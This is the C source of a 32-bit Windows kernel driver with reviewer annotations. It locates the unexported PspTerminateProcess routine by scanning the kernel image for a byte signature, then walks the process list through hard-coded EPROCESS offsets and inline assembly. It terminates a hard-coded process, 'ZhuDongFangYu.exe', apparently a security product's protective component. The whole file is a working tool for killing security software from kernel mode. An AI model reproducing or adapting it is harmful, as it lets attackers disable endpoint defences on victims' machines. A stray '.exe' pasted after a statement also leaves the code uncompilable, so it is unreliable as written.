#include <ntddk.h>
/*
 * Private copy of the loader's module-list entry layout (not exposed by the
 * public ntddk.h headers).  GetKernelBase below reads only InLoadOrderLinks,
 * DllBase, SizeOfImage and BaseDllName, but every field ahead of them must
 * keep its exact size and order for those reads to land on the right bytes.
 *
 * NOTE(review): this is an undocumented structure; the widths chosen here
 * (UINT32 counters, 4-byte PVOIDs) only line up with a 32-bit kernel of the
 * version the author copied them from.  Confirm against the target OS's
 * symbols before trusting any of the offsets.
 */
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;           /* must stay first: GetKernelBase casts Flink straight to an entry pointer */
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;                         /* image base, returned by GetKernelBase */
    PVOID EntryPoint;
    UINT32 SizeOfImage;                    /* image size, returned by GetKernelBase */
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;            /* compared (case-insensitively) against L"ntoskrnl.exe" */
    UINT32 Flags;
    UINT16 LoadCount;
    UINT16 TlsIndex;
    LIST_ENTRY HashLinks;
    PVOID SectionPointer;
    UINT32 CheckSum;
    UINT32 TimeDateStamp;
    PVOID LoadedImports;
    PVOID EntryPointActivationContext;
    PVOID PatchInformation;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
/* Standard driver entry point; the definition follows below. */
NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING reg_path);

/*
 * Walk the loader module list reachable from driver->DriverSection looking
 * for the entry named "ntoskrnl.exe" and write its DllBase / SizeOfImage
 * through the two out pointers.  Both outputs are left untouched when no
 * such entry is found.  (The definition below spells the out parameters
 * ppKrnlBase / puKrnlImageSize; prototype names carry no meaning.)
 */
VOID GetKernelBase(PDRIVER_OBJECT driver, PVOID *pKrnlBase, PUINT32 uKrnlImageSize);

/*
 * Byte-granularity scan of [pBeginAddress, pEndAddress) for featureCodeLen
 * bytes equal to featureCode.  Returns an address 6 bytes before the first
 * match, or 0 if there is none.  (The definition below misspells the length
 * parameter as featureCodeeLen.)
 */
PVOID MemorySearch(PVOID featureCode, UINT32 featureCodeLen, PVOID pBeginAddress, PVOID pEndAddress);

/*
 * Walk the process list starting from the process its inline assembly picks
 * up and return the first EPROCESS whose image-name field strcmp()s equal to
 * processName, or 0 if the walk returns to its start without a match.
 */
PEPROCESS GetPEPROCESS(PCHAR processName);

/* Unload callback installed by DriverEntry; it only logs. */
VOID DriverUnload(PDRIVER_OBJECT driver);
/*
 * Signature assumed for the non-exported kernel routine that DriverEntry
 * locates by byte-pattern scan.  NOTE(review): the typedef name starts with
 * an underscore followed by an uppercase letter, which C reserves for the
 * implementation.
 */
typedef NTSTATUS(*_PspTerminateProcess)(PEPROCESS pEprocess, NTSTATUS ExitCode);

/* Filled in by DriverEntry from MemorySearch; stays 0 if the pattern is not found. */
_PspTerminateProcess PspTerminateProcess;

/* Kernel image base and size, filled in by GetKernelBase (zero until then). */
PVOID pKrnlBase;
UINT32 uKrnlImageSize;

/*
 * File-scope EPROCESS pointer.  NOTE(review): DriverEntry declares a local
 * of the same name, so this global is shadowed there and never assigned.
 */
PEPROCESS pEprocess;
/*
 * Driver entry point.  Observable behaviour, in order:
 *   1. resolve ntoskrnl.exe's base and size from the loader module list
 *      (GetKernelBase);
 *   2. scan that image for a 40-byte pattern and store the hit in the global
 *      PspTerminateProcess (MemorySearch);
 *   3. look up one hard-coded image name in the process list (GetPEPROCESS)
 *      and, if found, call the located routine on it with exit code 0;
 *   4. install DriverUnload.
 * Returns 0 (== STATUS_SUCCESS) on every path, so the load never reports
 * failure even when nothing was found.
 *
 * NOTE(review): every pointer cast here and in the helpers goes through
 * UINT32, so the code only makes sense on a 32-bit kernel.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING reg_path)
{
    UNREFERENCED_PARAMETER(reg_path);
    /* Ten 32-bit words = 40 bytes of search pattern; passed to MemorySearch as raw bytes. */
    UINT32 featureCode[] = {
        0x0124a164, 0x758b0000, 0x44703b08, 0x0db80775,
        0xebc00000, 0xbe8d575a, 0x00000248, 0x200147f6,
        0x868d1274, 0x00000174
    };
    GetKernelBase(driver, &pKrnlBase, &uKrnlImageSize);
    /* "Kernel base: %p, size: %X" */
    DbgPrint("内核基址: %p,大小: %X\n", pKrnlBase, uKrnlImageSize);
    /* Scan [base, base + size); the end address is built with 32-bit arithmetic on the pointer. */
    PspTerminateProcess = (_PspTerminateProcess)MemorySearch(featureCode, sizeof(featureCode), pKrnlBase, (PVOID)((UINT32)pKrnlBase + uKrnlImageSize));
    DbgPrint("PspTerminateProcess: %p\n", PspTerminateProcess);
    /* Local shadows the file-scope pEprocess; the global is never written. */
    PEPROCESS pEprocess = GetPEPROCESS("ZhuDongFangYu.exe");
    DbgPrint("pEprocess:%p.\n", pEprocess);
    if (pEprocess == 0)
    {
        /* Returns success without installing DriverUnload (assigned only further down), so on this path the driver cannot be unloaded. */
        return 0;
    }
    /*
     * NOTE(review): no NULL check — MemorySearch returns 0 when the pattern
     * is absent, and a call through 0 here faults in kernel mode.
     */
    PspTerminateProcess(pEprocess, 0);
    /* "ZhuDongFangYu.exe was closed." */
    DbgPrint("ZhuDongFangYu.exe 被关闭了.\n");
    /* NOTE(review): the trailing ".exe" after the semicolon is not C — it looks like a paste artifact and would not compile as written. */
    driver->DriverUnload = DriverUnload;.exe
    return STATUS_SUCCESS;
}
/*
 * Locate ntoskrnl.exe in the loader module list.
 *
 * driver->DriverSection is treated as this driver's own LDR_DATA_TABLE_ENTRY
 * and the InLoadOrderLinks ring is followed via Flink until it wraps back to
 * the starting entry.  Each node's BaseDllName is compared case-insensitively
 * with L"ntoskrnl.exe"; on a match DllBase and SizeOfImage are written through
 * ppKrnlBase / puKrnlImageSize.  If the ring is walked without a match both
 * outputs are left untouched.
 *
 * NOTE(review): the Flink cast relies on InLoadOrderLinks being the first
 * member, so CONTAINING_RECORD is an identity offset here.  Any sentinel node
 * in the ring is read as though it were a full entry — presumably harmless
 * only because the name compare fails on it; confirm on the target OS.
 */
VOID
GetKernelBase(PDRIVER_OBJECT driver, PVOID *ppKrnlBase, PUINT32 puKrnlImageSize)
{
    PLDR_DATA_TABLE_ENTRY pLdteHead;
    PLDR_DATA_TABLE_ENTRY pLdteCur;
    UNICODE_STRING usKrnlBaseDllName;
    RtlInitUnicodeString(&usKrnlBaseDllName, L"ntoskrnl.exe");
    /* DriverSection is opaque in the public headers; this reinterprets it as a loader entry. */
    pLdteHead = (PLDR_DATA_TABLE_ENTRY)driver->DriverSection;
    pLdteCur = pLdteHead;
    do
    {
        PLDR_DATA_TABLE_ENTRY pLdte = CONTAINING_RECORD(pLdteCur, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
        /* TRUE = case-insensitive compare; 0 means equal. */
        if (RtlCompareUnicodeString(&pLdte->BaseDllName, &usKrnlBaseDllName, TRUE) == 0)
        {
            *ppKrnlBase = pLdte->DllBase;
            *puKrnlImageSize = pLdte->SizeOfImage;
            return;
        }
        /* Flink points at the next node's InLoadOrderLinks, which is at offset 0 of the entry. */
        pLdteCur = (PLDR_DATA_TABLE_ENTRY)pLdte->InLoadOrderLinks.Flink;
    }
    while (pLdteHead != pLdteCur);
    /* Not found: outputs deliberately untouched. */
    return;
}
/*
 * Linear byte-pattern scan.
 *
 * Steps pCur one byte at a time from pBeginAddress until it equals
 * pEndAddress, comparing featureCodeeLen bytes at each position with
 * featureCode.  RtlCompareMemory returns the count of leading bytes that
 * match, so equality with featureCodeeLen means a full hit.  On a hit the
 * address 6 bytes *before* the match is returned (the caller uses it as a
 * function pointer, so the pattern presumably sits 6 bytes into the routine
 * — TODO confirm); 0 is returned if nothing matches.
 *
 * NOTE(review): `((UINT32)pCur)++` treats a cast as an lvalue, which is an
 * MSVC extension, and truncates the pointer to 32 bits.  The compare also
 * reads featureCodeeLen bytes past pCur, so the last positions before
 * pEndAddress read beyond the range, and no check is made that the pages
 * in [pBeginAddress, pEndAddress) are resident.
 */
PVOID
MemorySearch(PVOID featureCode, UINT32 featureCodeeLen, PVOID pBeginAddress, PVOID pEndAddress)
{
    PVOID pCur = pBeginAddress;
    while (pCur != pEndAddress)
    {
        if (RtlCompareMemory(featureCode, pCur, featureCodeeLen) == featureCodeeLen)
        {
            /* Match found: back up 6 bytes (see header note). */
            return (PUINT32)((UINT32)pCur - 6);
        }
        /* Advance by one byte via 32-bit integer arithmetic on the pointer. */
        ((UINT32)pCur)++;
    }
    return 0;
}
/*
 * Find a process by image name by walking the process list with hard-coded
 * structure offsets.
 *
 * The inline assembly loads a pointer from fs:[0x124] and then the pointer
 * stored 0x44 bytes into it, and uses that as the starting EPROCESS
 * (presumably current thread -> owning process on a 32-bit kernel; the
 * offsets are version-specific — TODO confirm against target symbols).  For
 * each process the bytes at +0x174 are treated as a NUL-terminated image name
 * and strcmp()'d against processName.  The next process is reached by reading
 * the pointer at +0x88 and subtracting 0x88, i.e. +0x88 is assumed to be a
 * LIST_ENTRY whose Flink points at the same field of the next process.  The
 * walk stops when it returns to the starting process and yields 0.
 *
 * NOTE(review): x86-32 only (fs segment, eax, MSVC __asm).  No locking or
 * reference is taken on the processes being walked, the list's sentinel node
 * is read as if it were a process, and strcmp has no length bound on the
 * +0x174 field.
 */
PEPROCESS GetPEPROCESS(PCHAR processName)
{
    PEPROCESS pEprocess, pCurProcess;
    PCHAR ImageFileName;
    /* fs:[0x124] -> [that + 0x44] -> pEprocess; meaning of the offsets is assumed, see header. */
    __asm
    {
        mov eax, fs:[0x124];
        mov eax, [eax + 0x44];
        mov pEprocess, eax;
    }
    pCurProcess = pEprocess;
    do
    {
        /* Hard-coded offset of the image-name field. */
        ImageFileName = (PCHAR)pCurProcess + 0x174;
        if (strcmp(ImageFileName, processName) == 0)
        {
            return pCurProcess;
        }
        /* Follow the link at +0x88 and convert it back to a process pointer. */
        pCurProcess = (PEPROCESS)(*(PULONG)((ULONG)pCurProcess + 0x88) - 0x88);
    }
    while (pEprocess != pCurProcess);
    return 0;
}
/*
 * Unload callback installed by DriverEntry.  Nothing is torn down here; the
 * routine only emits a debug message ("driver unloaded successfully").
 */
VOID
DriverUnload(PDRIVER_OBJECT driver)
{
    (void)driver;
    DbgPrint("驱动卸载成功\n");
}